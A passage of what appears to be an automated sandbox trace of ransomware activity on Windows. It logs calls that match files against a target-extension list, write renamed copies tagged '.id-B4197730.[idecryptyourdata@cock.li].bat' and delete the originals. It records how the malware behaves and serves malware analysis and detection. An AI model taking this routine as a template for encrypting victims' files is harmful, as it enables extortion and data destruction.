(lpString1=".7z", lpString2="dll") returned -1 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString=".dbf") returned 4 [0184.731] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString=".1cd") returned 4 [0184.731] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString=".jpg") returned 4 [0184.731] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString=".doc") returned 4 [0184.731] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.731] lstrlenW (lpString=".docx") returned 5 [0184.731] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0184.731] lstrlenW (lpString=".pdf") returned 4 [0184.731] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.731] lstrlenW (lpString=".xls") returned 4 [0184.731] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.731] lstrlenW (lpString=".xlsx") returned 5 [0184.731] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0184.731] lstrlenW (lpString=".ppt") returned 4 [0184.731] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.731] lstrlenW (lpString=".zip") returned 4 [0184.732] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.732] lstrlenW (lpString=".rar") returned 4 [0184.732] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.732] lstrlenW (lpString=".bz2") returned 4 [0184.732] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.732] lstrlenW (lpString=".7z") returned 3 [0184.732] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.732] lstrlenW (lpString=".dbf") returned 4 [0184.732] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.732] lstrlenW (lpString=".1cd") returned 4 [0184.732] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.732] lstrlenW (lpString=".jpg") returned 4 [0184.732] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.732] lstrcmpiW (lpString1=".tlb", lpString2=".bat") returned 1 [0184.732] lstrlenW (lpString="vstoee90.tlb") returned 12 [0184.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0184.733] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=22680) returned 1 [0184.733] CloseHandle (hObject=0x394) returned 1 [0184.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 0x20 [0184.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0184.733] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.734] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0184.734] GetLastError () returned 0x0 [0184.734] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x5898, lpOverlapped=0x0) returned 1 [0187.851] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x58a0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x58a0, lpOverlapped=0x0) returned 1 [0187.852] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0187.852] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xec, lpOverlapped=0x0) returned 1 [0187.852] SetEndOfFile (hFile=0x3a8) returned 1 [0187.853] CloseHandle (hObject=0x3a8) returned 1 [0187.853] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0187.853] SetEndOfFile (hFile=0x394) returned 1 [0187.854] CloseHandle (hObject=0x394) returned 1 [0187.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0187.854] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 1 [0187.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.854] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.854] lstrlenW (lpString=".doc") returned 4 [0187.854] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0187.854] lstrlenW (lpString=".docx") returned 5 [0187.854] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0187.854] lstrlenW (lpString=".pdf") returned 4 [0187.854] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0187.854] lstrlenW (lpString=".xls") returned 4 [0187.855] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0187.855] lstrlenW (lpString=".xlsx") returned 5 [0187.855] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0187.855] lstrlenW (lpString=".ppt") returned 4 [0187.855] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString=".zip") returned 4 [0187.855] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0187.855] lstrlenW (lpString=".rar") returned 4 [0187.855] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString=".bz2") returned 4 [0187.855] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString=".7z") returned 3 [0187.855] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString=".dbf") returned 4 [0187.855] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString=".1cd") returned 4 [0187.855] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString=".jpg") returned 4 [0187.855] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.855] lstrlenW (lpString=".doc") returned 4 [0187.855] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString=".docx") returned 5 [0187.855] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0187.855] lstrlenW (lpString=".pdf") returned 4 [0187.855] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0187.855] lstrlenW (lpString=".xls") returned 4 [0187.855] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0187.856] lstrlenW (lpString=".xlsx") returned 5 [0187.856] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0187.856] lstrlenW (lpString=".ppt") returned 4 [0187.856] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0187.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.856] lstrlenW (lpString=".zip") returned 4 [0187.856] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0187.856] lstrlenW (lpString=".rar") returned 4 [0187.856] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0187.856] lstrlenW (lpString=".bz2") returned 4 [0187.856] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0187.856] lstrlenW (lpString=".7z") returned 3 [0187.856] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0187.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.856] lstrlenW (lpString=".dbf") returned 4 [0187.856] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0187.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.856] lstrlenW (lpString=".1cd") returned 4 [0187.856] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0187.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 64 [0187.856] lstrlenW (lpString=".jpg") returned 4 [0187.856] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0187.856] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0187.856] lstrlenW (lpString="dcpr.dll") returned 8 [0187.856] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0187.857] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=159808) returned 1 [0187.857] CloseHandle (hObject=0x394) returned 1 [0187.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll")) returned 0x20 [0187.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0187.858] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0187.858] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0187.858] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0187.858] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0187.859] GetLastError () returned 0x0 [0187.859] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x27040, lpOverlapped=0x0) returned 1 [0188.841] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x27050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x27050, lpOverlapped=0x0) returned 1 [0188.844] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0188.844] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0188.844] SetEndOfFile (hFile=0x3a8) returned 1 [0188.844] CloseHandle (hObject=0x3a8) returned 1 [0188.844] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0188.844] SetEndOfFile (hFile=0x394) returned 1 [0188.846] CloseHandle (hObject=0x394) returned 1 [0188.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0189.510] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll")) returned 1 [0189.511] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.511] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.511] lstrlenW (lpString=".doc") returned 4 [0189.511] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString=".docx") returned 5 [0189.511] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0189.511] lstrlenW (lpString=".pdf") returned 4 [0189.511] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString=".xls") returned 4 [0189.511] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString=".xlsx") returned 5 [0189.511] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0189.511] lstrlenW (lpString=".ppt") returned 4 [0189.511] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.511] lstrlenW (lpString=".zip") returned 4 [0189.511] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString=".rar") returned 4 [0189.511] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.511] lstrlenW (lpString=".bz2") returned 4 [0189.511] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.511] lstrlenW (lpString=".7z") returned 3 [0189.512] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString=".dbf") returned 4 [0189.512] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString=".1cd") returned 4 [0189.512] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString=".jpg") returned 4 [0189.512] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString=".doc") returned 4 [0189.512] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString=".docx") returned 5 [0189.512] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0189.512] lstrlenW (lpString=".pdf") returned 4 [0189.512] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString=".xls") returned 4 [0189.512] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString=".xlsx") returned 5 [0189.512] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0189.512] lstrlenW (lpString=".ppt") returned 4 [0189.512] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.512] lstrlenW (lpString=".zip") returned 4 [0189.512] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.512] lstrlenW (lpString=".rar") returned 4 [0189.513] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.513] lstrlenW (lpString=".bz2") returned 4 [0189.513] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.513] lstrlenW (lpString=".7z") returned 3 [0189.513] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.513] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.513] lstrlenW (lpString=".dbf") returned 4 [0189.513] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.513] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.513] lstrlenW (lpString=".1cd") returned 4 [0189.513] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.513] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 47 [0189.513] lstrlenW (lpString=".jpg") returned 4 [0189.513] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.513] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0189.513] lstrlenW (lpString="npdeployJava1.dll") returned 17 [0189.513] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0190.913] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=1156672) returned 1 [0190.913] CloseHandle (hObject=0x398) returned 1 [0190.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll")) returned 0x20 [0190.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0190.913] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0190.914] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0190.914] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0190.914] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0190.914] GetLastError () returned 0x0 [0190.914] ReadFile (in: hFile=0x398, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0194.432] WriteFile (in: hFile=0x338, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0195.726] ReadFile (in: hFile=0x398, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x1a650, lpOverlapped=0x0) returned 1 [0195.827] WriteFile (in: hFile=0x338, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x1a660, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x1a660, lpOverlapped=0x0) returned 1 [0195.831] ReadFile (in: hFile=0x398, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0195.831] WriteFile (in: hFile=0x338, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0195.831] SetEndOfFile (hFile=0x338) returned 1 [0195.831] CloseHandle (hObject=0x338) returned 1 [0195.831] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0195.831] SetEndOfFile (hFile=0x398) returned 1 [0195.833] CloseHandle (hObject=0x398) returned 1 [0195.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0195.833] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll")) returned 1 [0195.833] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.833] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.833] lstrlenW (lpString=".doc") returned 4 [0195.833] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.833] lstrlenW (lpString=".docx") returned 5 [0195.833] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0195.833] lstrlenW (lpString=".pdf") returned 4 [0195.833] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.834] lstrlenW (lpString=".xls") returned 4 [0195.834] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.834] lstrlenW (lpString=".xlsx") returned 5 [0195.834] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0195.834] lstrlenW (lpString=".ppt") returned 4 [0195.834] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.834] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.834] lstrlenW (lpString=".zip") returned 4 [0195.834] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.834] lstrlenW (lpString=".rar") returned 4 [0195.834] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.834] lstrlenW (lpString=".bz2") returned 4 [0195.834] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.834] lstrlenW (lpString=".7z") returned 3 [0195.893] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString=".dbf") returned 4 [0195.893] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString=".1cd") returned 4 [0195.893] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.893] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 65 [0195.893] lstrlenW (lpString=".jpg") returned 4 